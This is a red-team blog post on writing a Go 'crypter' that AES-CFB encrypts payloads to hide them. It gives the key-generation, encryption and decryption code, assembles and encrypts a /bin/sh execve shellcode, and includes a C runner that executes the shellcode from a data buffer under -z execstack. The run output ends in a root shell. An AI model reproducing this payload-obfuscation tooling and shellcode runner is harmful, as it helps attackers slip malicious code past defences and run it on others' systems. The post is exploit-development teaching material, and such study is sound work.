[ExpDev] Custom Go Crypter

What is Crypter?

Encryption Process

Decryption Process

Generate Key Code

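// chars is the alphabet a generated key is drawn from: 62 printable symbols.
var chars = []rune("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")

// randKeyGen returns a random key of n symbols drawn from chars.
//
// The indices come from crypto/rand (the same rand.Reader Encrypt uses for
// its IV) rather than math/rand: a key picked by a seedable, predictable
// generator can be reproduced by anyone who learns or guesses the seed, which
// defeats the point of encrypting at all. Bytes are drawn with rejection
// sampling so each symbol is equally likely; a plain b % len(chars) would
// favour the low symbols. A non-positive n yields "".
//
// Note on the original "128 bit" label: with n == 32 the result is 32 bytes
// long, which aes.NewCipher treats as an AES-256 key; each symbol carries
// about 5.95 bits of entropy (log2 62), so the key space is well above 2^128.
func randKeyGen(n int) string {
	if n <= 0 {
		return ""
	}
	// Largest multiple of len(chars) that fits in a byte (248 for 62 symbols);
	// bytes at or above it are discarded to keep the draw uniform.
	limit := byte(256 - 256%len(chars))
	out := make([]rune, 0, n)
	buf := make([]byte, n)
	for len(out) < n {
		if _, err := io.ReadFull(rand.Reader, buf); err != nil {
			// The OS CSPRNG being unavailable is not something this helper can
			// recover from; a silent fallback would hand out a weak key.
			panic(err)
		}
		for _, b := range buf {
			if b >= limit {
				continue // reject to avoid modulo bias
			}
			out = append(out, chars[int(b)%len(chars)])
			if len(out) == n {
				break
			}
		}
	}
	return string(out)
}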

Encryption Code

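// Encrypt: Original Text --> Add IV --> Encrypt with Key --> Base64 Encode
//
// Encrypt encrypts text with AES in CFB mode under key and returns
// IV || ciphertext as a URL-safe base64 string. key must be 16, 24 or 32
// bytes (AES-128/192/256); any other length makes aes.NewCipher fail and the
// function panics, as does a failure to read the IV from crypto/rand. A fresh
// random IV is drawn for every call, so encrypting the same text twice yields
// different output.
//
// CFB gives confidentiality only: nothing here lets Decrypt detect a modified
// ciphertext, so tampered input decrypts to garbage rather than failing. An
// AEAD mode (cipher.NewGCM) is the usual answer when integrity matters; it is
// not switched here because the wire format must stay compatible with Decrypt.
func Encrypt(key []byte, text []byte) string {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	// Layout: [IV (aes.BlockSize bytes)][ciphertext (len(text) bytes)].
	// The original spelled this variable "cipher-text", which does not compile.
	ciphertext := make([]byte, aes.BlockSize+len(text))
	iv := ciphertext[:aes.BlockSize]
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		panic(err)
	}
	// Encryption: the keystream is written straight after the IV.
	stream := cipher.NewCFBEncrypter(block, iv)
	stream.XORKeyStream(ciphertext[aes.BlockSize:], text)
	// URL-safe alphabet ('-' and '_' instead of '+' and '/'), padded with '='.
	return base64.URLEncoding.EncodeToString(ciphertext)
}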

Decryption Code

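// Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key
//
// Decrypt reverses Encrypt: it base64-decodes encryptedText, splits off the
// leading IV and AES-CFB-decrypts the remainder under key. It panics when the
// input is not valid URL-safe base64 (the original discarded that error and
// went on to slice an empty buffer), when the input is shorter than one block
// so there is no room for an IV, or when key is not 16, 24 or 32 bytes.
//
// The length check now runs before the IV is sliced off; slicing first, as
// the original did, already panicked with an index error on short input, so
// the "too short" check could never fire. CFB carries no integrity protection:
// a wrong key or a tampered ciphertext does not fail, it returns garbage.
func Decrypt(key []byte, encryptedText string) string {
	ciphertext, err := base64.URLEncoding.DecodeString(encryptedText)
	if err != nil {
		panic(err)
	}
	// Checking BlockSize = IV, before touching ciphertext[:aes.BlockSize].
	if len(ciphertext) < aes.BlockSize {
		panic("[Error] Ciphertext is too short!")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	// Using IV: the first block of the decoded input.
	iv := ciphertext[:aes.BlockSize]
	ciphertext = ciphertext[aes.BlockSize:]
	// Decryption Process; XORKeyStream permits dst and src to be the same
	// slice, so this decrypts in place.
	stream := cipher.NewCFBDecrypter(block, iv)
	stream.XORKeyStream(ciphertext, ciphertext)
	return string(ciphertext)
}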

Final Testing

# go run goBase64Crypter.go "bigb0ss"
[INFO] Original Text : bigb0ss
[INFO] Random Key : Fnf4Ml3Z6MhP11qMQ0zehdp9dEj5j5Pn
[INFO] Encrypted Base64 : JpbQCdofLYb7aceWzkb2i0xNakO8aAg=

[INFO] Decrypted Text : bigb0ss
# go run goBase64Crypter.go "bigb0ss"
[INFO] Original Text : bigb0ss
[INFO] Random Key : CQroxMZRxOZlXWlU5v6yQdpzz8ibYUhp
[INFO] Encrypted Base64 : PJHvYqoEK1K5thBrPMIRqndRI8kH0f4=

[INFO] Decrypted Text : bigb0ss
# python compilerX86.py -f bin-sh[+] Assemble: bin-sh.nasm
[+] Linking: bin-sh.o
[+] Shellcode: "\xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x08\x89\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
# go run goBase64Crypter.go "\xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x08\x89\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"[INFO] Original Text : \xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x08\x89\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43[INFO] Random Key : klWNvxnW1l3yjQKwe1RjxPxfXnYr1Hia[INFO] Encrypted Base64 : 3t6ZzvwR39fTwyRjR_nFOyGNqY6S65Gj9r3UApTp7cM_2-5Hq5vL3qHCu9IJkJd1OQKWzGHpNiEy90_Ii0TT_QLgKkB5uUd87RTwc0KNfoBXEv9TPkAhLOPG0tt3b2LlihCmZuDuuW55YptaSU89bU8pd4qEPy4ze9SYQHSj8vbTJU4is0VLimXyeas0Dabx0Y7P3VvsRaHlZm9JC_Eg6witdoonWzv7_ck2lw9CY3EzyaChN3HGEoPTL-fAj0AD3rCWBP7BG3WJHi9nAnQzfUbieOE=[INFO] Decrypted Text : \xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x08\x89\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43
#include<stdio.h>
#include<string.h>
/* The stage bytes shown on the page, kept in a writable global array. */
unsigned char code[] = \
"\xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x08\x89\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";
/* NOTE(review): pre-C99 implicit int; current compilers reject this unless
   warnings are silenced, which is what the -w flag on the page does. */
main()
{
/* NOTE(review): %d with a size_t argument is a type mismatch; %zu is the
   portable form. */
printf("Shellcode Length: %d", strlen(code));
/* Treating a data buffer as a function only works when the mapping holding
   `code` is executable. NX / W^X is the default mitigation that makes this
   call fault, and the -z execstack build flag on the page is what is relied
   on to lift it — this data-to-code jump is the behaviour EDR rules and
   hardening baselines are built to catch. */
int (*ret)() = (int(*)())code;
ret();
}
# gcc -fno-stack-protector -z execstack -o shellcode shellcode.c -w# ./shellcode 
# id
uid=0(root) gid=0(root) groups=0(root)
# exit

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security
